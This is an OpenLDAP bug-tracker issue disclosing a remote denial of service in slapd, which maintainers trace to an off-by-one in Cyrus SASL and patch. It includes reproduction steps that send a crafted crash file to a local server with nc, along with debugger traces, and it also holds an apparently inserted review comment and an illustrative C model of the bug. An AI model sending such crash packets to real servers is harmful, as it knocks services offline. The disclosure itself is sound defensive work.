Issue 9123 - Unauthenticated remote denial-of-service
Summary: Unauthenticated remote denial-of-service
Status: VERIFIED WONTFIX
Alias: None
Product: OpenLDAP
Classification: Unclassified
Component: slapd (show other issues)
Version: 2.4.48
Hardware: All All
: --- normal
Target Milestone: ---
Assignee: OpenLDAP project
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2019-11-28 14:03 UTC by stephan@srlabs.de
Modified: 2020-03-14 17:06 UTC (History)

See Also:


Description stephan@srlabs.de 2019-11-28 14:03:28 UTC
Full_Name: Stephan Zeisberg
Version: 2.4.48
OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64)
URL: 
Submission from: (NULL) (78.54.65.139)


Dear openldap team —

# Issue description

Unauthenticated remote denial-of-service through malformed ldap packet

# Version

openldap-2.4.48.tgz

# How to reproduce

## Compile

$ tar xzvf openldap-2.4.48.tgz
$ cd openldap-2.4.48
$ ./configure --prefix=/tmp/openldap
$ make depend
$ make
$ make install
$ cd /tmp/openldap

## Start server

$ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091

## Create PoC crash file

$ echo -n "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"
| xxd -r -p > ldap.crash

## Execute PoC (may need to be executed multiple times)

$  nc 127.0.0.1 9091 < ldap.crash



# GDB

...
slapd: malloc.c:2379: sysmalloc: Assertion `(old_top == initial_top (av) &&
old_size == 0) || ((unsigned long) (old_size) >= MINSIZE && prev_inuse (old_top)
&& ((unsigned long) old_end & (pagesize - 1)) == 0)' failed.

Thread 3 "slapd" received signal SIGABRT, Aborted.
[Switching to Thread 0x7fffb4aba700 (LWP 3684510)]
0x00007ffff5b3a625 in raise () from /lib64/libc.so.6
Missing separate debuginfos, use: dnf debuginfo-install
cyrus-sasl-gssapi-2.1.27-2.fc31.x86_64 cyrus-sasl-lib-2.1.27-2.fc31.x86_64
cyrus-sasl-plain-2.1.27-2.fc31.x86_64 keyutils-libs-1.6-3.fc31.x86_64
krb5-libs-1.17-45.fc31.x86_64 libcom_err-1.45.3-1.fc31.x86_64
libdb-5.3.28-38.fc31.x86_64 libgcc-9.2.1-1.fc31.x86_64 libicu-63.2-3.fc31.x86_64
libselinux-2.9-5.fc31.x86_64 libstdc++-9.2.1-1.fc31.x86_64
libuuid-2.34-3.fc31.x86_64 nss-mdns-0.14.1-4.fc31.x86_64
openssl-libs-1.1.1d-2.fc31.x86_64 zlib-1.2.11-20.fc31.x86_64
(gdb) bt
#0  0x00007ffff5b3a625 in raise () from /lib64/libc.so.6
#1  0x00007ffff5b238d9 in abort () from /lib64/libc.so.6
#2  0x00007ffff5b85a7a in __malloc_assert () from /lib64/libc.so.6
#3  0x00007ffff5b882bf in sysmalloc () from /lib64/libc.so.6
#4  0x00007ffff5b89072 in _int_malloc () from /lib64/libc.so.6
#5  0x00007ffff5b8af55 in calloc () from /lib64/libc.so.6
#6  0x00007ffff5b7ced8 in open_memstream () from /lib64/libc.so.6
#7  0x00007ffff5bf99d5 in __vsyslog_internal () from /lib64/libc.so.6
#8  0x00007ffff5bf9f4a in syslog () from /lib64/libc.so.6
#9  0x00000000004ef3b4 in slap_sasl_log (context=0x7ffff54bf110,
priority=<optimized out>, 
    message=0x7fffa8103d30 "Couldn't find mech
a\202\003\336\060\202\003&#1696;\003\002\001\005\241\025\033\023W2K3.VMNET1.VM.BASE\242D0B\240\003\002\001\002\241;09\033\004ldap\033\034w9\335\063-101.w2k3.vmnet1.vm.base\033\023w2k3.vmne\240\003\002\001\027\241\003\002\001\b\242\202\003b\004\202\003^\242\065\252\353K\215\255,\301\246\177T\333\003\003R\314\064\206L\214\363\266C\242\327\323\021\036\n\353\340\356\371q0\264Pl\277(\260\034l+\264\232\355\355\t\270dN\301F&#1172;\t\327\030\070\030{\023Z\247y"...)
at sasl.c:146
#10 0x00007ffff6203344 in sasl_seterror () from /lib64/libsasl2.so.3
#11 0x00007ffff6202324 in sasl_server_start () from /lib64/libsasl2.so.3
#12 0x00000000004f1098 in slap_sasl_bind (op=<optimized out>, rs=0x7fffb4ab88b0)
at sasl.c:1524
#13 0x000000000049fd28 in fe_op_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at
bind.c:280
#14 0x000000000049f350 in do_bind (op=0x7fffa8003120, rs=0x7fffb4ab88b0) at
bind.c:205
#15 0x0000000000472ca8 in connection_operation (ctx=0x7fffb4ab89e8,
arg_v=0x7fffa8003120) at connection.c:1158
#16 0x0000000000471332 in connection_read_thread (ctx=0x7fffb4ab89e8,
argv=<optimized out>) at connection.c:1294
#17 0x00000000005fee7a in ldap_int_thread_pool_wrapper (xpool=0xa0b9f10) at
tpool.c:696
#18 0x00007ffff5e444e2 in start_thread () from /lib64/libpthread.so.0
#19 0x00007ffff5bff693 in clone () from /lib64/libc.so.6

Please let me know what additional information I can provide to successfully
reproduce the issue.

Note: I have also tested and reproduced the issue using the precompiled package
from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP:
slapd 2.4.47 (Jul 25 2019 00:00:00))

-Stephan Zeisberg
Comment 1 Howard Chu 2019-11-28 14:49:28 UTC
Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting
this issue to them.

valgrind confirms it as well:

5ddfddde do_bind: dn () SASL mech <garbage>
5ddfddde ==> sasl_bind: dn="" mech=<garbage>
datalen=0
==11019== Thread 3:
==11019== Invalid write of size 1
==11019==    at 0x4B9B1DB: sasl_seterror (seterror.c:247)
==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
==11019==    by 0x21E130: fe_op_bind (bind.c:279)
==11019==    by 0x21DCE1: do_bind (bind.c:205)
==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
==11019==    by 0x4EFA322: clone (clone.S:95)
==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
==11019==    by 0x21E130: fe_op_bind (bind.c:279)
==11019==    by 0x21DCE1: do_bind (bind.c:205)
==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
==11019==
==11019== Invalid read of size 1
==11019==    at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==11019==    by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688)
==11019==    by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114)
==11019==    by 0x3A1FFA: lutil_debug (debug.c:74)
==11019==    by 0x266FF3: slap_sasl_log (sasl.c:146)
==11019==    by 0x4B9B4CF: sasl_seterror (seterror.c:260)
==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
==11019==    by 0x21E130: fe_op_bind (bind.c:279)
==11019==    by 0x21DCE1: do_bind (bind.c:205)
==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
==11019==    by 0x21E130: fe_op_bind (bind.c:279)
==11019==    by 0x21DCE1: do_bind (bind.c:205)
==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)




-- 
  -- Howard Chu
  CTO, Symas Corp.           http://www.symas.com
  Director, Highland Sun     http://highlandsun.com/hyc/
  Chief Architect, OpenLDAP  http://www.openldap.org/project/
Comment 2 Howard Chu 2019-11-28 14:54:59 UTC
Resending with the non-printable chars omitted:

Howard Chu wrote:
> Thanks, but your trace clearly shows that this is a fault in Cyrus SASL, you should be reporting
> this issue to them.
> 
> valgrind confirms it as well:
> 
> 5ddfddde do_bind: dn () SASL mech <garbage>
> 5ddfddde ==> sasl_bind: dn="" mech=<garbage>
> datalen=0
> ==11019== Thread 3:
> ==11019== Invalid write of size 1
> ==11019==    at 0x4B9B1DB: sasl_seterror (seterror.c:247)
> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
> ==11019==    by 0x4EFA322: clone (clone.S:95)
> ==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
> ==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
> ==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
> ==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
> ==11019==
> ==11019== Invalid read of size 1
> ==11019==    at 0x483DF54: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==11019==    by 0x4E53DE4: __vfprintf_internal (vfprintf-internal.c:1688)
> ==11019==    by 0x4E67029: __vsnprintf_internal (vsnprintf.c:114)
> ==11019==    by 0x3A1FFA: lutil_debug (debug.c:74)
> ==11019==    by 0x266FF3: slap_sasl_log (sasl.c:146)
> ==11019==    by 0x4B9B4CF: sasl_seterror (seterror.c:260)
> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019==  Address 0x62032a8 is 0 bytes after a block of size 600 alloc'd
> ==11019==    at 0x483CFAF: realloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
> ==11019==    by 0x4B930A4: _buf_alloc (common.c:2186)
> ==11019==    by 0x4B93299: _sasl_add_string (common.c:196)
> ==11019==    by 0x4B9B2D4: sasl_seterror (seterror.c:187)
> ==11019==    by 0x4B9A18D: sasl_server_start (server.c:1418)
> ==11019==    by 0x26B88B: slap_sasl_bind (sasl.c:1666)
> ==11019==    by 0x21E130: fe_op_bind (bind.c:279)
> ==11019==    by 0x21DCE1: do_bind (bind.c:205)
> ==11019==    by 0x1F35BA: connection_operation (connection.c:1185)
> ==11019==    by 0x1F3CE7: connection_read_thread (connection.c:1342)
> ==11019==    by 0x35DFF9: ldap_int_thread_pool_wrapper (tpool.c:1048)
> ==11019==    by 0x4DBE668: start_thread (pthread_create.c:479)
> 
> 
> 
> 


-- 
  -- Howard Chu
  CTO, Symas Corp.           http://www.symas.com
  Director, Highland Sun     http://highlandsun.com/hyc/
  Chief Architect, OpenLDAP  http://www.openldap.org/project/

Comment 3 stephan@srlabs.de 2019-11-28 14:57:30 UTC
Hi Howard —

Thanks for the quick reply. Will forward the report upstream to Cyrus SASL.

Best

    -Stephan


Comment 4 Howard Chu 2019-11-28 15:16:34 UTC
Stephan Zeisberg wrote:
> Hi Howard —
> 
> Thanks for the quick reply. Will forward the report upstream to Cyrus SASL.

For reference, this fixes the bug:

vielle:/home/software/cyrus-sasl> git diff
diff --git a/lib/common.c b/lib/common.c
index bc3bf1df..9969d6aa 100644
--- a/lib/common.c
+++ b/lib/common.c
@@ -190,7 +190,7 @@ int _sasl_add_string(char **out, size_t *alloclen,

   if (add==NULL) add = "(null)";

-  addlen=strlen(add); /* only compute once */
+  addlen=strlen(add)+1; /* only compute once */
   if (_buf_alloc(out, alloclen, (*outlen)+addlen)!=SASL_OK)
     return SASL_NOMEM;

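Review bot: the `+1` in `addlen=strlen(add)+1` reserves room for the terminating NUL in the `_buf_alloc` request, which is exactly what the valgrind output above points at (a one-byte write at 0 bytes past the block that `_buf_alloc` grew on behalf of `_sasl_add_string`). Since the `/* only compute once */` comment says `addlen` is reused below the visible context, check that the later copy and the `*outlen` update still advance by the string length only, so the extra byte is never counted as content on the next append; a short note on the changed line saying the byte is for the terminator would make the intent clear to the next reader.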


Git history shows this bug has existed since the code was originally written in
commit 061698456069833e244d66ce33c8f82c2cd63ce3
Author: Rob Siemborski <rjs3@andrew.cmu.edu>
Date:   Tue Dec 4 01:59:43 2001 +0000




-- 
  -- Howard Chu
  CTO, Symas Corp.           http://www.symas.com
  Director, Highland Sun     http://highlandsun.com/hyc/
  Chief Architect, OpenLDAP  http://www.openldap.org/project/
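The off-by-one that the patch in the comment above corrects, modelled as an added example (hypothetical code written for this page, not Cyrus SASL's or OpenLDAP's): `add_string` sizes its `_buf_alloc`-style request with or without the terminator byte, and `build_mech_error` replays the "Couldn't find mech" diagnostic from the trace with a constructed mechanism name.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical model of a growable string buffer in the style of Cyrus
 * SASL's _sasl_add_string()/_buf_alloc(); written for this page as an
 * illustration, it is not the library's code. */
typedef struct {
    char *buf;
    size_t alloclen;  /* bytes currently allocated for buf */
    size_t outlen;    /* bytes of content, not counting the terminator */
} strbuf_t;

enum { ADD_OK = 0, ADD_NOMEM = -1, ADD_WOULD_OVERFLOW = -2 };

/* Grow buf so that at least 'need' bytes are allocated. The model allocates
 * exactly what is requested: a real allocator usually rounds sizes up, which
 * hides a one-byte overrun most of the time (consistent with the report's
 * note that the PoC may need several runs before the assertion fires). */
static int buf_alloc(strbuf_t *s, size_t need)
{
    if (need <= s->alloclen)
        return ADD_OK;
    char *p = realloc(s->buf, need);
    if (p == NULL)
        return ADD_NOMEM;
    s->buf = p;
    s->alloclen = need;
    return ADD_OK;
}

/* Append 'add' to s. With reserve_nul == 0 the allocation request covers only
 * strlen(add) bytes (the sizing before the patch); with reserve_nul == 1 it
 * also covers the terminator (the patched sizing). Where the real code would
 * write the terminator one byte past the block, this model refuses and
 * reports ADD_WOULD_OVERFLOW instead. */
int add_string(strbuf_t *s, const char *add, int reserve_nul)
{
    if (add == NULL)
        add = "(null)";
    size_t len = strlen(add);
    size_t addlen = reserve_nul ? len + 1 : len;   /* the patched line */
    if (buf_alloc(s, s->outlen + addlen) != ADD_OK)
        return ADD_NOMEM;
    /* The content itself always fits: outlen + len <= alloclen either way. */
    memcpy(s->buf + s->outlen, add, len);
    s->outlen += len;
    /* The terminator lands at index outlen, which must be below alloclen. */
    if (s->outlen >= s->alloclen)
        return ADD_WOULD_OVERFLOW;
    s->buf[s->outlen] = '\0';
    return ADD_OK;
}

/* Build the diagnostic the trace shows slapd logging: a fixed prefix followed
 * by the client-supplied mechanism name (a constructed sample here). Returns
 * the result of the last append; *len_out receives the content length. */
int build_mech_error(int reserve_nul, size_t *len_out)
{
    const char *mech = "NOT-A-MECHANISM";   /* constructed, not a real mech */
    strbuf_t s = { NULL, 0, 0 };
    int rc = add_string(&s, "Couldn't find mech ", reserve_nul);
    if (rc == ADD_OK)
        rc = add_string(&s, mech, reserve_nul);
    if (len_out != NULL)
        *len_out = s.outlen;
    free(s.buf);
    return rc;
}

/* Content length produced by the patched sizing: the reserved byte is never
 * counted as content, so the length equals the prefix plus the mech name. */
size_t fixed_content_len(void)
{
    size_t n = 0;
    build_mech_error(1, &n);
    return n;
}

int main(void)
{
    int before = build_mech_error(0, NULL);
    int after = build_mech_error(1, NULL);
    printf("pre-fix sizing : rc=%d (-2 = terminator would overflow)\n", before);
    printf("patched sizing : rc=%d, %zu bytes of content\n",
           after, fixed_content_len());
    return 0;
}
```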

Comment 5 stephan@srlabs.de 2019-11-28 15:39:25 UTC
Created an issue upstream [1] and included the valgrind output and proposed patch.

[1] https://github.com/cyrusimap/cyrus-sasl/issues/587

    -Stephan


Comment 6 Quanah Gibson-Mount 2020-03-14 17:06:49 UTC
not an openldap bug, fixed in cyrus-sasl upstream